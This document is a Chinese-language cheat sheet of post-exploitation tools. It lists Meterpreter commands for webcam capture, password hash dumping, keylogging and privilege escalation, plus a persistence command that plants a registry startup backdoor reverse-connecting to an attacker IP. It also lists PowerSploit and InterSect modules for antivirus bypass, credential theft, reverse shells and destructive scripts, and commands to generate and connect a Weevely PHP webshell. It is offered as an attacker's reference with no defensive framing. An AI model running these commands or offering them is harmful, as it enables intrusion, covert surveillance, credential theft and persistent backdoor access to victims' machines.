1、Meterpreter
它是Metasploit框架中功能强大的后渗透模块。可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端。
命令 作用
sessions 查看会话ID信息
idletime 显示目标主机截止当前无操作命令的时间
webcam_snap 抓取目标主机的摄像头,将拍摄的内容保存到本地
run checkvm 检查目标主机是否是虚拟机
rdesktop 执行rdesktop -u username -p password ip 执行命令之后就会弹出一个窗口对目标进行控制
hashdump 获得密码的hash值
keylogrecorder 记录键盘信息
vnc 打开远程目标桌面
getsystem 目标系统权限提升
Meterpreter相当于攻击成功后驻留在内存中的Shellcode,为了保持长久的控制,metasplpoit提供了persistence和metsvc,模块,用于在目标为windows系统上安装开机运行或永久服务等后门。命令如下:
meterpreter>run persistence -X -i 5 -p 2000 -r 192.168.1.101 #在注册表中写入开机启动项,反向连接192.168.1.101:2000(攻击者的ip和端口) -X表示开机启动 ,-i表示反向连接间隔
meterpreter>run metsvc #安装系统服务metsvc
2、PowerSpoit
基于PowerShell的后门集成框架。需要.Net环境支持。其主要模块:
1、CodeExecution 在目标主机执行代码
2、ScriptModification 在目标主机上创建或修改脚本
3、Persistence 设置后门,开机启动或安装服务等
4、AntivirusBypass 绕过杀毒软件
5、Exfiltration 在目标主机上进行信息搜集的工具
6、Mayhem 蓝屏等破坏性脚本
7、Recon 以目标主机为跳板进行内网侦查
3、InterSect
是一个后渗透完成多种后期任务的Python程序。它能够自动收集密码文件和网络信息,并且能够识别杀毒软件和防火墙程序。若需要使用它自动执行后期任务,需要创建自己的脚本文件,并在脚本中指定所需的各种功能,InterSect为每种功能提供对应的模块,其包含的功能模块:
1、creds 收集认证信息
2、extras 搜索操作系统和应用程序的配置文件,以检索特定的应用程序和防护程序
3、network 收集网络信息,例如服务端口和dns信息
4、lanmap 枚举在线主机并收集ip地址
5、osuser 枚举操作系统信息
6、openshares 在特定的主机上查找smb的公开共享
7、portscan 简易的端口扫描程序,可以扫描特定ip的1~1000端口
8、egressbuster 在指定的端口范围内,搜索可用的外联端口
9、privsec 检测Linux内核的系统是否存在可提权漏洞
10、xmlcrack 将哈希列表发送端远程XMLRPC,以继续破解
11、reversexor 采用异或加密的reverse shell
12、bshell 基于tcp协议的bind shell
13、rshell 基于tcp协议的reverse shell
14、xorshell 基于xor加密的bind shell
15、aeshttp 采用aes算法加密的HTTP reverse shell
16、udpbind 采用udp协议的bind shell,默认端口为 21541
17、persistent 会在系统启动时自动运行的持久型后门
4、Weevely
是一款功能强大的PHP后门工具,它使用HTTP协议包头部进行指令传输。它的使用非常简单,但仅支持php语言。
建立后门:weevely generate <password> <path> #password为自己设置的后门连接密码,path为存放生成的木马文件路径
连接后门:weevely <URL> <password> [cmd] #URL为后门地址,password为后门密码,cmd为可选项,表示要执行的命令